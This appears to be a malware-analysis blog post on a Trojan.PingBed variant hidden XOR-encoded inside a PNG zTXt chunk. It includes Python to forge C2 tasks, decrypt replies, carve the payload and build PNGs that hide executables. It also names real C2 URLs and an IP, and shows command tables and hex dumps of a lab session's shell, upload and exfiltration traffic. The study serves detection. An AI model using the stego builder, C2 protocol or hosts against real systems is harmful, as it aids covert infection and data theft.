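    """Decode a C2 task and return (command byte, name, trailing bytes), or None.
    Assumption: the page's offsets apply to the Base64-decoded bytes."""
    raw = base64.b64decode(b64_task)
    if len(raw) <= CMD_OFFSET or not magic_ok(raw):
        return None
    cmd = raw[CMD_OFFSET]
    # Bounds check at 004026D6: (cmd - 0x64) <= 0x5A, i.e. 0x64..0xBE is
    # accepted; the byte table at 0x402938 sends unknown values to the default.
    if not 0x64 <= cmd <= 0xBE:
        return None
    return cmd, HELLO_COMMANDS.get(cmd, "default handler"), raw[CMD_OFFSET + 1:]


def make_task(cmd: int, tail: bytes = b"") -> bytes:
    """Constructed C2 task: 135 don't-care bytes, magic bytes chosen so the two
    sums give 0x7B / 0xFA, four NULLs, the command byte, a command-specific
    tail, all Base64-encoded as the Trojan expects."""
    magic = bytes([0x7B, 0xFA, 0, 0, 0, 0, 0, 0])
    return base64.b64encode(bytes(135) + magic + bytes(4) + bytes([cmd]) + tail)


def derive_reply_key(hdr24: bytes) -> bytes:
    """9-byte XOR key from the 24-byte reply header: the byte at offset 20
    followed by bytes 0..7, each XORed with the byte at offset 8."""
    if len(hdr24) != 24:
        raise ValueError("expected the 24-byte reply header")
    src = bytes([hdr24[20]]) + hdr24[:8]
    return bytes(b ^ hdr24[8] for b in src)


def decrypt_reply(body: bytes):
    """Split a reply into the 24-byte header and the data, derive the key from
    the header and XOR-decrypt the data with it. Returns (key, plaintext)."""
    hdr, data = body[:24], body[24:]
    key = derive_reply_key(hdr)
    plain = bytes(b ^ key[i % len(key)] for i, b in enumerate(data))
    return key, plain


# Reply bytes copied from the dump above (offsets 0x58..0x9F): the 24-byte
# header followed by the first 48 bytes of encrypted process-list output.
SAMPLE_REPLY = bytes.fromhex(
    "230D2A1F0E0F20BF" "F7100000AA000000" "00000000F2020000"   # 24-byte header
    "35DDA18E918A8CB2" "25258488B28B9C8B"
    "A4150FE0F38E918A" "8CB2250FE7C2EDE1"
    "8A95A43B2BB182B8" "E1AAA1841C4099A6"
)
```

Decrypting the 48 captured bytes yields the beginning of the process list, "0\t[System Process]\n4\tSystem\n380\tsmss.exe\tSYSTEM\", which confirms the key derivation. Because the key is a function of the header alone, a network sensor that sees the POST body can recover every reply without any secret material.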

Malware obfuscated within PNG files

  • Today I will take a look at some malware that is obfuscated within a PNG file.
  • Based on comparison to other samples, the Trojan at hand is a variant of Trojan.PingBed.
  • Let me start by saying that this is Stage2 malware: another malicious file (the Stage1 malware) has to be present on the system already in order to download, decrypt and execute the Trojan hidden in the PNG file.
  • The Stage1 malware requests an HTML file that contains a Base64-encoded instruction telling it which file to download and how to run it. I do not have a copy of this Stage1 malware. When I get my hands on a sample I will post an analysis of it.
  • An example of this HTML file is hosted here (as of the date of this post):
 http://www.systatservices.com/default3.html
  • This HTML file contains a Base64-encoded comment that is the instruction for the Stage1 Trojan:
<!-- dWdlc2hzdGF0LnBuZyAxMi4xODUuMjIyLjggNDQz -->
Decodes to:
ugeshstat.png 12.185.222.8 443
  • The decoded string appears to tell the Stage1 Trojan to download shstat.png (what the leading "ug" stands for is not clear) and to run the executable extracted from it with the IP address and port number as its arguments.
  • The PNG file in question is hosted here (as of the date of this post):
http://www.systatservices.com/shstat.png
  • The characteristics of this PNG file are shown below:
File Name:  shstat.png
File Size:  193633 bytes
MD5:        5af7cad4c0feec683e6d2d20abb981f6
SHA1:       6e1d3e36dcee3d75bda5b69423dc56605b6f1bc6
  • Opening this PNG file will NOT infect your computer because we are not dealing with any exploits here. In fact, this PNG file will render just fine even though it contains an obfuscated executable within it.

  • The obfuscated executable is carried in a zTXt chunk of the PNG file. A legitimate zTXt chunk holds a keyword, a NUL, a compression-method byte and zlib-compressed text. zTXt is an ancillary chunk (lowercase first letter), so a decoder that cannot make sense of its contents is free to skip it silently, which makes it a convenient place to hide something without breaking the image.
  • The Stage1 Trojan therefore parses the PNG file for the zTXt chunk, extracts the obfuscated binary, and executes it. The obfuscation is a simple XOR with 0xFF (every bit inverted). A quick sanity check: the chunk length field in the dump below is 0x00024200 = 147968 bytes, exactly the size of the executable carved out further down. The dump shows the end of the preceding chunk, the zTXt length and type fields, and the beginning of the executable after the XOR has been undone:
Offset      0  1  2  3  4  5  6  7   8  9  A  B  C  D  E  F

0000B240   00 D4 D1 72 77 C4 7C C6  64 00 02 42 00 7A 54 58    ÔÑrwÄ|Æd  B zTX
0000B250   74 4D 5A 90 00 03 00 00  00 04 00 00 00 FF FF 00   tMZ          ÿÿ
0000B260   00 B8 00 00 00 00 00 00  00 40 00 00 00 00 00 00    ¸       @     
0000B270   00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00                  
0000B280   00 00 00 00 00 00 00 00  00 00 00 00 00 E0 00 00                à 
0000B290   00 0E 1F BA 0E 00 B4 09  CD 21 B8 01 4C CD 21 54      º  ´ Í!¸ LÍ!T
0000B2A0   68 69 73 20 70 72 6F 67  72 61 6D 20 63 61 6E 6E   his program cann
0000B2B0   6F 74 20 62 65 20 72 75  6E 20 69 6E 20 44 4F 53   ot be run in DOS
0000B2C0   20 6D 6F 64 65 2E 0D 0D  0A 24 00 00 00 00 00 00    mode.   $
  • If we copy out the executable we end up with the following file, which I will name shstat.exe:
File Name:  shstat.exe
File Size:  147968 bytes
MD5:        74cd481b9628e4f1a053c67e6967b695
SHA1:       807ab3dea5bea326f03e4a44c123953200a9ed4a
PE Time:    0x4D25DCED [Thu Jan 06 15:17:01 2011 UTC]
AV:         0/41 (0%) [VirusTotal]
PEID Sig:   Microsoft Visual C++ 8
Sections (4):
Name      Entropy  MD5
.text     6.65     d90aaef60a2746dae14a93df14ca090b
.rdata    5.13     65f1ccc1f17039943feb963704a71c0b
.data     3.75     f6a71b81ab7423d4f6bbfd3fba406611
.rsrc     5.11     d5ecc406ee2be45ed510958b0d4f326a
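Carving the executable out of the PNG, as an added example (my code, not the Stage1 Trojan's and not from the original post): walk the chunk list, verify each CRC, flag zTXt chunks that are not valid zTXt, and undo the XOR with 0xFF. The PNG and the MZ header stand-in used here are constructed inline so the script runs without the real shstat.png, and the validity heuristic (keyword, NUL, method byte, then a zlib inflate) is my own rather than anything the page describes.

```python
import struct
import zlib

PNG_SIG = b"\x89PNG\r\n\x1a\n"


def iter_chunks(png: bytes):
    """Walk the chunk list after the 8-byte signature, yielding
    (type, data, crc_ok) for each chunk up to and including IEND."""
    if not png.startswith(PNG_SIG):
        raise ValueError("not a PNG file")
    off = len(PNG_SIG)
    while off + 12 <= len(png):
        length, ctype = struct.unpack(">I4s", png[off:off + 8])
        data = png[off + 8:off + 8 + length]
        (crc,) = struct.unpack(">I", png[off + 8 + length:off + 12 + length])
        crc_ok = (zlib.crc32(ctype + data) & 0xFFFFFFFF) == crc
        yield ctype, data, crc_ok
        off += 12 + length
        if ctype == b"IEND":
            break


def is_valid_ztxt(data: bytes) -> bool:
    """Heuristic (mine, not a full validator): a real zTXt is a 1-79 byte
    keyword, a NUL, compression method 0, then a zlib stream that inflates."""
    nul = data.find(b"\x00", 1, 80)
    if nul == -1 or len(data) < nul + 3 or data[nul + 1] != 0:
        return False
    try:
        zlib.decompress(data[nul + 2:])
        return True
    except zlib.error:
        return False


def carve_ztxt_payloads(png: bytes, xor_key: int = 0xFF):
    """For every zTXt chunk that is not valid zTXt, undo the XOR and keep the
    result if an MZ header appears. Returns [(executable_bytes, crc_ok)]."""
    hits = []
    for ctype, data, crc_ok in iter_chunks(png):
        if ctype != b"zTXt" or is_valid_ztxt(data):
            continue
        plain = bytes(b ^ xor_key for b in data)
        if plain[:2] == b"MZ":
            hits.append((plain, crc_ok))
    return hits


def chunk(ctype: bytes, data: bytes) -> bytes:
    """Length + type + data + CRC32 over type and data, as the PNG spec lays it out."""
    crc = zlib.crc32(ctype + data) & 0xFFFFFFFF
    return struct.pack(">I", len(data)) + ctype + data + struct.pack(">I", crc)


def build_sample_png(text_or_payload: bytes, hide: bool = True) -> bytes:
    """Constructed 1x1 greyscale PNG. With hide=True the zTXt chunk carries the
    payload XORed with 0xFF, the way shstat.png does; with hide=False it
    carries a legitimate compressed comment."""
    ihdr = struct.pack(">IIBBBBB", 1, 1, 8, 0, 0, 0, 0)   # 1x1, 8-bit grey
    idat = zlib.compress(b"\x00\x00")                    # filter byte + one pixel
    if hide:
        ztxt = bytes(b ^ 0xFF for b in text_or_payload)
    else:
        ztxt = b"Comment\x00\x00" + zlib.compress(text_or_payload)
    return (PNG_SIG + chunk(b"IHDR", ihdr) + chunk(b"zTXt", ztxt)
            + chunk(b"IDAT", idat) + chunk(b"IEND", b""))


# Constructed stand-in for the DOS header seen in the dump (not the real file):
# e_magic..e_lfarlc, 32 zero bytes, e_lfanew = 0xE0, then the DOS stub text.
FAKE_PE = (b"MZ\x90\x00\x03\x00\x00\x00\x04\x00\x00\x00\xff\xff\x00\x00"
           b"\xb8\x00\x00\x00\x00\x00\x00\x00\x40\x00\x00\x00" + b"\x00" * 32
           + b"\xe0\x00\x00\x00This program cannot be run in DOS mode.\r\r\n$")
```

A valid CRC on the zTXt chunk only tells you the actor used a proper PNG writer, so the CRC is not a detection signal on its own; the combination of an ancillary text chunk that does not inflate and a 2 MB-class chunk length on a small image is.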

TROJAN ANALYSIS – shstat.exe

  • As mentioned, this Trojan requires two arguments in order to run: an IP address and port number.
  • This Trojan uses SSL for its network communication, so the traffic samples that follow are after the encryption provided by SSL has been removed.
  • This Trojan starts by sending two transmissions to the C2 node.
  • The first transmission carries what looks like a fixed signature, a keyboard-walk pattern: !@#%$^#@! (bytes 0x21 0x40 0x23 0x25 0x24 0x5E 0x23 0x40 0x21 in the dump below).
  • The first DWORD is the total length of the message including the two-DWORD header (0x11 = 17 bytes: 8 header bytes plus the 9 signature bytes); the second DWORD reads as a message type (0 here, 8 for the system-information message that follows).
00000000  11 00 00 00 00 00 00 00  21 40 23 25 24 5e 23 40 ........ !@#%$^#@
00000010  21                                               !
  • The second transmission contains some basic system information:
00000011  f4 00 00 00 08 00 00 00  76 69 63 74 69 6d 00 00 ........ victim..
00000021  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00 ........ ........
00000031  00 00 00 00 00 00 00 00  31 39 32 2e 31 36 38 2e ........ 192.168.
00000041  31 2e 31 30 30 00 00 00  00 00 00 00 00 00 00 00 1.100... ........
00000051  00 00 00 00 00 00 00 00  02 00 00 00 02 00 00 00 ........ ........
00000061  00 00 00 00 00 00 00 00  9c 00 00 00 05 00 00 00 ........ ........
00000071  01 00 00 00 28 0a 00 00  02 00 00 00 53 65 72 76 ....(... ....Serv
00000081  69 63 65 20 50 61 63 6b  20 33 00 00 00 00 00 00 ice Pack  3......
00000091  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00 ........ ........
000000A1  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00 ........ ........
000000B1  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00 ........ ........
000000C1  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00 ........ ........
000000D1  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00 ........ ........
000000E1  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00 ........ ........
000000F1  00 00 00 00 00 00 00 00  00 00 00 00 03 00 00 00 ........ ........
00000101  00 01 01 00                                      ....
  • The Trojan reads the command from the second DWORD of the received data (the first DWORD is the length field, mirroring the frames the victim sends).
  • The code responsible for this is shown below (EDI points at the beginning of the received data):
0040486E   .  8B47 04           MOV EAX, DWORD PTR DS:[EDI+4]
00404871   .  83C4 0C           ADD ESP, 0C
00404874   .  83F8 07           CMP EAX, 7       
00404877   .  0F8F E1020000     JG shstat.00404B5E
0040487D   .  74 4C             JE SHORT shstat.004048CB
0040487F   .  48                DEC EAX
00404880   .  0F84 C4020000     JE shstat.00404B4A
00404886   .  48                DEC EAX
00404887   .  0F84 48010000     JE shstat.004049D5
0040488D   .  48                DEC EAX
0040488E   .  74 6B             JE SHORT shstat.004048FB
00404890   .  48                DEC EAX
00404891   .  74 43             JE SHORT shstat.004048D6
00404893   .  48                DEC EAX
00404894   .  0F85 DA020000     JNZ shstat.00404B74
0040489A   .  83C7 08           ADD EDI, 8    
0040489D   .  57                PUSH EDI
0040489E   .  E8 6C420000       CALL shstat.00408B0F
  • The following is a list of the commands and their purpose (written as they appear on the wire, as little-endian DWORDs):
01000000 -> Command shell
02000000 -> Download a file (from C2 node to victim)
03000000 -> Upload a file (from victim to C2 node)
04000000 -> Write to a file (used in conjunction with command 2)
05000000 -> TBD
06000000 -> TBD
07000000 -> Uninstall Trojan (deletes executable)
0A000000 -> TBD
0C000000 -> Process List
0D000000 -> Kill a process
0E000000 -> Drive list
10000000 -> Execute / Run As
  • Here is some PCAP data that was generated by my interaction with this Trojan using a Perl script I wrote.  As a reminder, what you are seeing below would be encrypted by the SSL session key.  Frames from the C2 node to the victim are the lines indented by one space, with their own offset counter starting at 0; the unindented lines with the continuing offsets are the victim's messages.
00000000  11 00 00 00 00 00 00 00  21 40 23 25 24 5e 23 40 ........ !@#%$^#@
00000010  21                                               !
00000011  f4 00 00 00 08 00 00 00  76 69 63 74 69 6d 00 00 ........ victim..
00000021  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00 ........ ........
00000031  00 00 00 00 00 00 00 00  31 39 32 2e 31 36 38 2e ........ 192.168.
00000041  31 2e 31 30 30 00 00 00  00 00 00 00 00 00 00 00 1.100... ........
00000051  00 00 00 00 00 00 00 00  02 00 00 00 02 00 00 00 ........ ........
00000061  00 00 00 00 00 00 00 00  9c 00 00 00 05 00 00 00 ........ ........
00000071  01 00 00 00 28 0a 00 00  02 00 00 00 53 65 72 76 ....(... ....Serv
00000081  69 63 65 20 50 61 63 6b  20 33 00 00 00 00 00 00 ice Pack  3......
00000091  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00 ........ ........
000000A1  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00 ........ ........
000000B1  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00 ........ ........
000000C1  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00 ........ ........
000000D1  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00 ........ ........
000000E1  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00 ........ ........
000000F1  00 00 00 00 00 00 00 00  00 00 00 00 03 00 00 00 ........ ........
00000101  00 01 01 00                                      ....
 00000000  08 00 00 00 01 00 00 00                          ........
00000105  14 00 00 00 0a 00 00 00  43 3a 5c 4d 41 4c 57 41 ........ C:\MALWA
00000115  52 45 3e 00                                      RE>.
 00000008  04 00 00 00 02 00 00 00  00 00 00 00 00 00 00 00 ........ ........
 00000018  62 61 64 2e 74 78 74 20  62 61 64 2e 74 78 74 00 bad.txt  bad.txt.
00000119  18 00 00 00 02 00 00 00  01 00 00 00 00 00 00 00 ........ ........
00000129  62 61 64 2e 74 78 74 00                          bad.txt. 
 00000028  2f 00 00 00 04 00 00 00  54 68 69 73 20 64 61 74 /....... This dat
 00000038  61 20 67 6f 69 6e 67 20  66 72 6f 6d 20 43 32 20 a going  from C2 
 00000048  6e 6f 64 65 20 74 6f 20  76 69 63 74 69 6d 2e    node to  victim.
 00000057  33 00 00 00 02 00 00 00  04 00 00 00 ff ff ff ff 3....... ........
00000131  10 00 00 00 02 00 00 00  04 00 00 00 ff ff ff ff ........ ........
 00000067  04 00 00 00 03 00 00 00  00 00 00 00 00 00 00 00 ........ ........
 00000077  73 65 63 72 65 74 2e 74  78 74 20 73 65 63 72 65 secret.t xt secre
 00000087  74 2e 74 78 74 00                                t.txt.
00000141  1b 00 00 00 03 00 00 00  01 00 00 00 ff ff ff ff ........ ........
00000151  73 65 63 72 65 74 2e 74  78 74 00                secret.t xt.
 0000008D  04 00 00 00 03 00 00 00  01 00 00 00 00 00 00 00 ........ ........
 0000009D  73 65 63 72 65 74 2e 74  78 74 20 73 65 63 72 65 secret.t xt secre
 000000AD  74 2e 74 78 74 00                                t.txt.
0000015C  3b 00 00 00 04 00 00 00  74 68 69 73 20 64 61 74 ;....... this dat
0000016C  61 20 62 65 69 6e 67 20  65 78 66 69 6c 65 64 20 a being  exfiled 
0000017C  66 72 6f 6d 20 74 68 65  20 76 69 63 74 69 6d 20 from the  victim 
0000018C  74 6f 20 43 32 20 6e 6f  64 65 2e                to C2 no de.
00000197  10 00 00 00 03 00 00 00  04 00 00 00 ff ff ff ff ........ ........
 000000B3  08 00 00 00 0c 00 00 00                          ........ 
000001A7  14 04 00 00 0c 00 00 00  2d 30 09 20 20 20 20 20 ........ -0.     
000001B7  20 20 20 20 20 20 20 20  20 20 20 20 20 20 20 20                  
000001C7  20 20 20 0a 2d 34 09 53  79 73 74 65 6d 20 20 20    .-4.S ystem   
000001D7  20 20 20 20 20 20 20 20  20 20 20 20 20 20 20 0a                 .
000001E7  2d 33 38 30 09 73 6d 73  73 2e 65 78 65 20 20 20 -380.sms s.exe   
000001F7  20 20 20 20 20 20 20 20  20 20 20 20 20 4e 54 20               NT 
00000207  41 55 54 48 4f 52 49 54  59 5c 53 59 53 54 45 4d AUTHORIT Y\SYSTEM
00000217  0a 2d 36 31 32 09 63 73  72 73 73 2e 65 78 65 20 .-612.cs rss.exe 
00000227  20 20 20 20 20 20 20 20  20 20 20 20 20 20 4e 54                NT
00000237  20 41 55 54 48 4f 52 49  54 59 5c 53 59 53 54 45  AUTHORI TY\SYSTE
00000247  4d 0a 2d 36 33 36 09 77  69 6e 6c 6f 67 6f 6e 2e M.-636.w inlogon.
00000257  65 78 65 20 20 20 20 20  20 20 20 20 20 20 20 4e exe             N
00000267  54 20 41 55 54 48 4f 52  49 54 59 5c 53 59 53 54 T AUTHOR ITY\SYST
00000277  45 4d 0a 2d 36 38 30 09  73 65 72 76 69 63 65 73 EM.-680. services
00000287  2e 65 78 65 20 20 20 20  20 20 20 20 20 20 20 20 .exe             
00000297  4e 54 20 41 55 54 48 4f  52 49 54 59 5c 53 59 53 NT AUTHO RITY\SYS
000002A7  54 45 4d 0a 2d 36 39 32  09 6c 73 61 73 73 2e 65 TEM.-692 .lsass.e
000002B7  78 65 20 20 20 20 20 20  20 20 20 20 20 20 20 20 xe               
000002C7  20 4e 54 20 41 55 54 48  4f 52 49 54 59 5c 53 59  NT AUTH ORITY\SY
000002D7  53 54 45 4d 0a 2d 38 36  34 09 76 6d 61 63 74 68 STEM.-86 4.vmacth
000002E7  6c 70 2e 65 78 65 20 20  20 20 20 20 20 20 20 20 lp.exe           
000002F7  20 20 4e 54 20 41 55 54  48 4f 52 49 54 59 5c 53   NT AUT HORITY\S
00000307  59 53 54 45 4d 0a 2d 38  39 32 09 73 76 63 68 6f YSTEM.-8 92.svcho
00000317  73 74 2e 65 78 65 20 20  20 20 20 20 20 20 20 20 st.exe           
00000327  20 20 20 4e 54 20 41 55  54 48 4f 52 49 54 59 5c    NT AU THORITY\
00000337  53 59 53 54 45 4d 0a 2d  39 36 34 09 73 76 63 68 SYSTEM.- 964.svch
00000347  6f 73 74 2e 65 78 65 20  20 20 20 20 20 20 20 20 ost.exe          
00000357  20 20 20 20 0a 2d 31 30  37 32 09 73 76 63 68 6f     .-10 72.svcho
00000367  73 74 2e 65 78 65 20 20  20 20 20 20 20 20 20 20 st.exe           
00000377  20 20 20 4e 54 20 41 55  54 48 4f 52 49 54 59 5c    NT AU THORITY\
00000387  53 59 53 54 45 4d 0a 2d  31 31 32 38 09 73 76 63 SYSTEM.- 1128.svc
00000397  68 6f 73 74 2e 65 78 65  20 20 20 20 20 20 20 20 host.exe         
000003A7  20 20 20 20 20 0a 2d 31  32 38 30 09 73 76 63 68      .-1 280.svch
000003B7  6f 73 74 2e 65 78 65 20  20 20 20 20 20 20 20 20 ost.exe          
000003C7  20 20 20 20 0a 2d 31 36  30 34 09 65 78 70 6c 6f     .-16 04.explo
000003D7  72 65 72 2e 65 78 65 20  20 20 20 20 20 20 20 20 rer.exe          
000003E7  20 20 20 56 49 43 54 49  4d 5c 75 73 65 72 6e 61    VICTI M\userna
000003F7  6d 65 0a 2d 31 36 38 30  09 56 4d 77 61 72 65 54 me.-1680 .VMwareT
00000407  72 61 79 2e 65 78 65 20  20 20 20 20 20 20 20 20 ray.exe          
00000417  20 56 49 43 54 49 4d 5c  75 73 65 72 6e 61 6d 65  VICTIM\ username
00000427  0a 2d 31 37 30 38 09 56  4d 77 61 72 65 55 73 65 .-1708.V MwareUse
00000437  72 2e 65 78 65 20 20 20  20 20 20 20 20 20 20 56 r.exe           V
00000447  49 43 54 49 4d 5c 75 73  65 72 6e 61 6d 65 0a 2d ICTIM\us ername.-
00000457  31 37 38 30 09 73 76 63  68 6f 73 74 2e 65 78 65 1780.svc host.exe
00000467  20 20 20 20 20 20 20 20  20 20 20 20 20 0a 2d 31               .-1
00000477  39 32 38 09 76 6d 74 6f  6f 6c 73 64 2e 65 78 65 928.vmto olsd.exe
00000487  20 20 20 20 20 20 20 20  20 20 20 20 4e 54 20 41              NT A
00000497  55 54 48 4f 52 49 54 59  5c 53 59 53 54 45 4d 0a UTHORITY \SYSTEM.
000004A7  2d 31 37 34 34 09 63 6d  64 2e 65 78 65 20 20 20 -1744.cm d.exe   
000004B7  20 20 20 20 20 20 20 20  20 20 20 20 20 20 56 49                VI
000004C7  43 54 49 4d 5c 75 73 65  72 6e 61 6d 65 0a 2d 31 CTIM\use rname.-1
000004D7  31 37 36 09 57 69 6e 48  65 78 2e 65 78 65 20 20 176.WinH ex.exe  
000004E7  20 20 20 20 20 20 20 20  20 20 20 20 56 49 43 54              VICT
000004F7  49 4d 5c 75 73 65 72 6e  61 6d 65 0a 2d 33 39 32 IM\usern ame.-392
00000507  09 69 64 61 67 2e 65 78  65 20 20 20 20 20 20 20 .idag.ex e       
00000517  20 20 20 20 20 20 20 20  20 56 49 43 54 49 4d 5c           VICTIM\
00000527  75 73 65 72 6e 61 6d 65  0a 2d 31 36 34 38 09 73 username .-1648.s
00000537  74 75 6e 6e 65 6c 2e 65  78 65 20 20 20 20 20 20 tunnel.e xe      
00000547  20 20 20 20 20 20 20 56  49 43 54 49 4d 5c 75 73        V ICTIM\us
00000557  65 72 6e 61 6d 65 0a 2d  31 32 34 34 09 49 6d 6d ername.- 1244.Imm
00000567  75 6e 69 74 79 44 65 62  75 67 67 65 72 2e 65 78 unityDeb ugger.ex
00000577  65 20 20 20 20 56 49 43  54 49 4d 5c 75 73 65 72 e    VIC TIM\user
00000587  6e 61 6d 65 0a 2d 31 33  33 32 09 73 68 73 74 61 name.-13 32.shsta
00000597  74 2e 65 78 65 20 20 20  20 20 20 20 20 20 20 20 t.exe            
000005A7  20 20 20 56 49 43 54 49  4d 5c 75 73 65 72 6e 61    VICTI M\userna
000005B7  6d 65 0a 00                                      me..
 000000BB  74 00 00 00 10 00 00 00  00 00 00 00 00 00 00 00 t....... ........
 000000CB  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00 ........ ........
 000000DB  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00 ........ ........
 000000EB  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00 ........ ........
 000000FB  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00 ........ ........
 0000010B  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00 ........ ........
 0000011B  00 00 00 00 00 00 00 00  6e 6f 74 65 70 61 64 2e ........ notepad.
 0000012B  65 78 65 00                                      exe.
 0000012F  71 00 00 00 10 00 00 00  00 00 00 00 00 00 00 00 q....... ........
 0000013F  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00 ........ ........
 0000014F  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00 ........ ........
 0000015F  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00 ........ ........
 0000016F  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00 ........ ........
 0000017F  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00 ........ ........
 0000018F  00 00 00 00 00 00 00 00  63 61 6c 63 2e 65 78 65 ........ calc.exe
 0000019F  00                                               .
 000001A0  08 00 00 00 0c 00 00 00                          ........
000005BB  6e 04 00 00 0c 00 00 00  2d 30 09 20 20 20 20 20 n....... -0.     
000005CB  20 20 20 20 20 20 20 20  20 20 20 20 20 20 20 20                  
000005DB  20 20 20 0a 2d 34 09 53  79 73 74 65 6d 20 20 20    .-4.S ystem   
000005EB  20 20 20 20 20 20 20 20  20 20 20 20 20 20 20 0a                 .
000005FB  2d 33 38 30 09 73 6d 73  73 2e 65 78 65 20 20 20 -380.sms s.exe   
0000060B  20 20 20 20 20 20 20 20  20 20 20 20 20 4e 54 20               NT 
0000061B  41 55 54 48 4f 52 49 54  59 5c 53 59 53 54 45 4d AUTHORIT Y\SYSTEM
0000062B  0a 2d 36 31 32 09 63 73  72 73 73 2e 65 78 65 20 .-612.cs rss.exe 
0000063B  20 20 20 20 20 20 20 20  20 20 20 20 20 20 4e 54                NT
0000064B  20 41 55 54 48 4f 52 49  54 59 5c 53 59 53 54 45  AUTHORI TY\SYSTE
0000065B  4d 0a 2d 36 33 36 09 77  69 6e 6c 6f 67 6f 6e 2e M.-636.w inlogon.
0000066B  65 78 65 20 20 20 20 20  20 20 20 20 20 20 20 4e exe             N
0000067B  54 20 41 55 54 48 4f 52  49 54 59 5c 53 59 53 54 T AUTHOR ITY\SYST
0000068B  45 4d 0a 2d 36 38 30 09  73 65 72 76 69 63 65 73 EM.-680. services
0000069B  2e 65 78 65 20 20 20 20  20 20 20 20 20 20 20 20 .exe             
000006AB  4e 54 20 41 55 54 48 4f  52 49 54 59 5c 53 59 53 NT AUTHO RITY\SYS
000006BB  54 45 4d 0a 2d 36 39 32  09 6c 73 61 73 73 2e 65 TEM.-692 .lsass.e
000006CB  78 65 20 20 20 20 20 20  20 20 20 20 20 20 20 20 xe               
000006DB  20 4e 54 20 41 55 54 48  4f 52 49 54 59 5c 53 59  NT AUTH ORITY\SY
000006EB  53 54 45 4d 0a 2d 38 36  34 09 76 6d 61 63 74 68 STEM.-86 4.vmacth
000006FB  6c 70 2e 65 78 65 20 20  20 20 20 20 20 20 20 20 lp.exe           
0000070B  20 20 4e 54 20 41 55 54  48 4f 52 49 54 59 5c 53   NT AUT HORITY\S
0000071B  59 53 54 45 4d 0a 2d 38  39 32 09 73 76 63 68 6f YSTEM.-8 92.svcho
0000072B  73 74 2e 65 78 65 20 20  20 20 20 20 20 20 20 20 st.exe           
0000073B  20 20 20 4e 54 20 41 55  54 48 4f 52 49 54 59 5c    NT AU THORITY\
0000074B  53 59 53 54 45 4d 0a 2d  39 36 34 09 73 76 63 68 SYSTEM.- 964.svch
0000075B  6f 73 74 2e 65 78 65 20  20 20 20 20 20 20 20 20 ost.exe          
0000076B  20 20 20 20 0a 2d 31 30  37 32 09 73 76 63 68 6f     .-10 72.svcho
0000077B  73 74 2e 65 78 65 20 20  20 20 20 20 20 20 20 20 st.exe           
0000078B  20 20 20 4e 54 20 41 55  54 48 4f 52 49 54 59 5c    NT AU THORITY\
0000079B  53 59 53 54 45 4d 0a 2d  31 31 32 38 09 73 76 63 SYSTEM.- 1128.svc
000007AB  68 6f 73 74 2e 65 78 65  20 20 20 20 20 20 20 20 host.exe         
000007BB  20 20 20 20 20 0a 2d 31  32 38 30 09 73 76 63 68      .-1 280.svch
000007CB  6f 73 74 2e 65 78 65 20  20 20 20 20 20 20 20 20 ost.exe          
000007DB  20 20 20 20 0a 2d 31 36  30 34 09 65 78 70 6c 6f     .-16 04.explo
000007EB  72 65 72 2e 65 78 65 20  20 20 20 20 20 20 20 20 rer.exe          
000007FB  20 20 20 56 49 43 54 49  4d 5c 75 73 65 72 6e 61    VICTI M\userna
0000080B  6d 65 0a 2d 31 36 38 30  09 56 4d 77 61 72 65 54 me.-1680 .VMwareT
0000081B  72 61 79 2e 65 78 65 20  20 20 20 20 20 20 20 20 ray.exe          
0000082B  20 56 49 43 54 49 4d 5c  75 73 65 72 6e 61 6d 65  VICTIM\ username
0000083B  0a 2d 31 37 30 38 09 56  4d 77 61 72 65 55 73 65 .-1708.V MwareUse
0000084B  72 2e 65 78 65 20 20 20  20 20 20 20 20 20 20 56 r.exe           V
0000085B  49 43 54 49 4d 5c 75 73  65 72 6e 61 6d 65 0a 2d ICTIM\us ername.-
0000086B  31 37 38 30 09 73 76 63  68 6f 73 74 2e 65 78 65 1780.svc host.exe
0000087B  20 20 20 20 20 20 20 20  20 20 20 20 20 0a 2d 31               .-1
0000088B  39 32 38 09 76 6d 74 6f  6f 6c 73 64 2e 65 78 65 928.vmto olsd.exe
0000089B  20 20 20 20 20 20 20 20  20 20 20 20 4e 54 20 41              NT A
000008AB  55 54 48 4f 52 49 54 59  5c 53 59 53 54 45 4d 0a UTHORITY \SYSTEM.
000008BB  2d 31 37 34 34 09 63 6d  64 2e 65 78 65 20 20 20 -1744.cm d.exe   
000008CB  20 20 20 20 20 20 20 20  20 20 20 20 20 20 56 49                VI
000008DB  43 54 49 4d 5c 75 73 65  72 6e 61 6d 65 0a 2d 31 CTIM\use rname.-1
000008EB  31 37 36 09 57 69 6e 48  65 78 2e 65 78 65 20 20 176.WinH ex.exe  
000008FB  20 20 20 20 20 20 20 20  20 20 20 20 56 49 43 54              VICT
0000090B  49 4d 5c 75 73 65 72 6e  61 6d 65 0a 2d 33 39 32 IM\usern ame.-392
0000091B  09 69 64 61 67 2e 65 78  65 20 20 20 20 20 20 20 .idag.ex e       
0000092B  20 20 20 20 20 20 20 20  20 56 49 43 54 49 4d 5c           VICTIM\
0000093B  75 73 65 72 6e 61 6d 65  0a 2d 31 36 34 38 09 73 username .-1648.s
0000094B  74 75 6e 6e 65 6c 2e 65  78 65 20 20 20 20 20 20 tunnel.e xe      
